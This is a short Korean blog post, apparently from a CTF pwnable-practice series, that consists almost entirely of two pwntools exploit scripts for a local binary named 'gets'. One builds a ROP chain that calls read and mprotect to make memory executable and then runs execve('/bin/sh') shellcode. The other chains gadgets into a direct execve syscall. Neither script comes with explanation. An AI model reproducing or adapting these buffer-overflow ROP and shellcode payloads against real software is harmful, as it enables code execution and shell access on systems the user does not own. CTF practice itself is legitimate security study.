mprotect_exploit.py
from pwn import *
p = process("./gets")
read = 0x0806D5F0
mprotect = 0x0806E0F0
pppr = 0x80bacfe
bss = 0x080eb000
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
payload = "A"*(0x18+4)
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)
payload += p32(bss)
p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(shellCode)
p.interactive()
syscall_exploit.py
from pwn import *
p = process("./gets")
gets_plt = 0x804f120
bss = 0x080eaf80
par = 0x080b81c6
pbr = 0x080481c9
pcr = 0x080de955
pdr = 0x0806f02a
syscall = 0x0806cc25
binsh = "/bin/sh\x00"
payload = "A"*(0x18+4)
payload += p32(gets_plt)
payload += p32(par)
payload += p32(bss)
payload += p32(par)
payload += p32(0xb)
payload += p32(pbr)
payload += p32(bss)
payload += p32(pcr)
payload += p32(0)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)
p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(binsh)
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| SECCON CTF 2018 Classic (0) | 2019.07.28 |
|---|---|
| Defcon CTF 2015 r0pbaby (0) | 2019.07.28 |
| Pico CTF 2018 Buffer Overflow 3 (0) | 2019.07.27 |
| Codegate 2018 CTF Quals BaskinRobins31 (0) | 2019.07.24 |
| Pico CTF 2013 ROP 1~4 (0) | 2019.07.24 |
JeonYoungSin
메모 기록용 공간